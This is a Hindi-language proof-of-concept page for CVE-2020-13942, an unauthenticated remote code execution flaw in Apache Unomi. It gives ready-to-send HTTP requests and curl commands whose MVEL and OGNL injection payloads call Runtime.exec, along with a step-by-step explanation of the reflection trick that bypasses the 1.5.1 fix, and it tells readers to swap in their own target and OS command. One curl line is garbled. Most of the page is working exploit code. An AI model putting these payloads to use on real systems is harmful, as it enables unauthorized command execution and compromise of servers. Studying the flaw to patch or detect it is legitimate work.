
CVE-2020-13942: MVEL और OGNL इंजेक्शन के माध्यम से बिना प्रमाणीकरण के RCE POC
भेद्यता के बारे में मूल ब्लॉग पोस्ट: https://www.checkmarx.com/blog/apache-unomi-cve-2020-13942-rce-vulnerabilities-discovered/
दो RCE वेक्टर हैं: MVEL इंजेक्शन के माध्यम से और OGNL इंजेक्शन के माध्यम से। दोनों वेक्टर अलग-अलग कोड को लक्षित करते हैं, हालांकि पेलोड अपेक्षाकृत समान दिखते हैं। पिछले CVE फिक्स https://nvd.nist.gov/vuln/detail/CVE-2020-11975 ने OGNL एक्सप्रेशन के निष्पादन को सीमित करने का प्रयास किया, लेकिन MVEL को पूरी तरह से छोड़ दिया। CVE-2020-13942 1.5.1 में किए गए फिक्स को बायपास करता है।
BurpSuite या curl का उपयोग करके Unomi सर्वर द्वारा एक्सपोज़ किए गए context.js\json पर निम्नलिखित HTTP अनुरोध भेजें और RCE प्राप्त करें। अपने लक्ष्य URL और OS कमांड के अनुसार Host और Content-length बदलें।
दोनों POCs को प्रतिक्रिया में HTTP/1.1 400 Header Folding मिल सकता है, जिसका अर्थ है कि पेलोड में \r\n गड़बड़ हो गए हैं, इसे एक बार फिर से कॉपी-पेस्ट करने का प्रयास करें।
POST /context.json HTTP/1.1
Host: localhost:8181
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:75.0) Gecko/20100101 Firefox/75.0
Content-Length: 486
{
"filters": [
{
"id": "boom",
"filters": [
{
"condition": {
"parameterValues": {
"": "script::Runtime r = Runtime.getRuntime(); r.exec(\"gnome-calculator\");"
},
"type": "profilePropertyCondition"
}
}
]
}
],
"sessionId": "boom"
}
curl -X POST http://localhost:8181/context.json --header 'Content-type: application/json' --data '{"filters":[{"id":"boom ","filters":[{"condition":{"parameterValues":{"propertyName":"prop","comparisonOperator":"equals","propertyValue":"script::Runtime r=Runtime.getRuntime();r.exec(\"gnome-calculator\");"},"type":"profilePropertyCondition"}}]}],"sessionId":"boom"}'
OGNL POC ने 1.5.1 संस्करण द्वारा शुरू की गई ClassLoader प्रतिबंध को बायपास किया। Java रिफ्लेक्शन API का उपयोग करके, ClassLoader.loadClass विधि को ट्रिगर किए बिना एक ऑब्जेक्ट बनाना संभव है, जो मूल्यांकित OGNL एक्सप्रेशन को प्रतिबंधित करता है।
पेलोड OGNL एक्सप्रेशन का विवरण:
#runtimeclass = #this.getClass().forName(\"java.lang.Runtime\") एक java.lang.Runtime क्लास ऑब्जेक्ट बनाता है, जहाँ #this कॉन्टेक्स्ट ऑब्जेक्ट का संदर्भ है।#getruntimemethod = #runtimeclass.getDeclaredMethods().{^ #this.name.equals(\"getRuntime\")}[0] रिफ्लेक्शन के माध्यम से Runtime क्लास की विधियों की सूची प्राप्त करता है और सूची में से getRuntime विधि चुनता है। एक्सप्रेशन का {^ #this.name.equals(\"getRuntime\")} भाग getRuntime नाम वाली विधि की खोज करता है और उन विधियों की सूची लौटाता है जो शर्त से मेल खाती हैं; इस सूची की पहली और एकमात्र विधि getRuntime है।#runtimeobject = #runtimemethod.invoke(null,null) getRuntime() विधि को कॉल करता है और Runtime ऑब्जेक्ट प्राप्त करता है।(#execmethod = #runtimeclass.getDeclaredMethods().{? #this.name.equals(\"exec\")}.{? #this.getParameters()[0].getType().getName().equals(\"java.lang.String\")}.{? #this.getParameters().length < 2}[0]) Runtime क्लास की विधियाँ प्राप्त करता है और विधि सूची में से एकल स्ट्रिंग तर्क के साथ Runtime.exec() प्राप्त करता है।#execmethod.invoke(#runtimeobject,\"gnome-calculator\") निर्दिष्ट तर्क के साथ Runtime.exec() को कॉल करता है।POST /context.json HTTP/1.1
Host: localhost:8181
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:75.0) Gecko/20100101 Firefox/75.0
Content-Length: 1068
{
"personalizations":[
{
"id":"gender-test",
"strategy":"matching-first",
"strategyOptions":{
"fallback":"var2"
},
"contents":[
{
"filters":[
{
"condition":{
"parameterValues":{
"propertyName":"(#runtimeclass = #this.getClass().forName(\"java.lang.Runtime\")).(#getruntimemethod = #runtimeclass.getDeclaredMethods().{^ #this.name.equals(\"getRuntime\")}[0]).(#rtobj = #getruntimemethod.invoke(null,null)).(#execmethod = #runtimeclass.getDeclaredMethods().{? #this.name.equals(\"exec\")}.{? #this.getParameters()[0].getType().getName().equals(\"java.lang.String\")}.{? #this.getParameters().length < 2}[0]).(#execmethod.invoke(#rtobj,\" gnome-calculator\"))",
"comparisonOperator":"equals",
"propertyValue":"male"
},
"type":"profilePropertyCondition"
}
}
]
}
]
}
],
"sessionId":"boom"
}
curl -XPOST http://localhost:8181/context.jsonder 'Content-Type: application/json' --data '{"personalizations":[{"id":"gender-test","strategy":"matching-first","strategyOptions":{"fallback":"var2"},"contents":[{"filters":[{"condition":{"parameterValues":{"propertyName": "(#runtimeclass = #this.getClass().forName(\"java.lang.Runtime\")).(#getruntimemethod = #runtimeclass.getDeclaredMethods().{^ #this.name.equals(\"getRuntime\")}[0]).(#rtobj = #getruntimemethod.invoke(null,null)).(#execmethod = #runtimeclass.getDeclaredMethods().{? #this.name.equals(\"exec\")}.{? #this.getParameters()[0].getType().getName().equals(\"java.lang.String\")}.{? #this.getParameters().length < 2}[0]).(#execmethod.invoke(#rtobj,\"gnome-calculator\"))","comparisonOperator":"equals","propertyValue":"male"},"type":"profilePropertyCondition"}}]}]}],"sessionId":"boom"}'
इस पृष्ठ पर दी गई सभी जानकारी केवल शैक्षिक उद्देश्यों के लिए है। इस वेबसाइट पर दी गई जानकारी का उपयोग केवल आपके कंप्यूटर सिस्टम की सुरक्षा बढ़ाने के लिए किया जाना चाहिए, न कि दुर्भावनापूर्ण या हानिकारक हमलों के लिए।
आपको इस जानकारी का दुरुपयोग करके कंप्यूटर सिस्टम में अनधिकृत पहुंच प्राप्त नहीं करनी चाहिए। यह भी ध्यान रखें कि ऐसे कंप्यूटरों पर हैकिंग के प्रयास करना, जिनके आप मालिक नहीं हैं, मालिकों से लिखित अनुमति के बिना, अवैध है।
मैं इस वेबसाइट पर दी गई जानकारी के उपयोग से होने वाली किसी भी प्रत्यक्ष या अप्रत्यक्ष क्षति के लिए जिम्मेदार नहीं हूँ।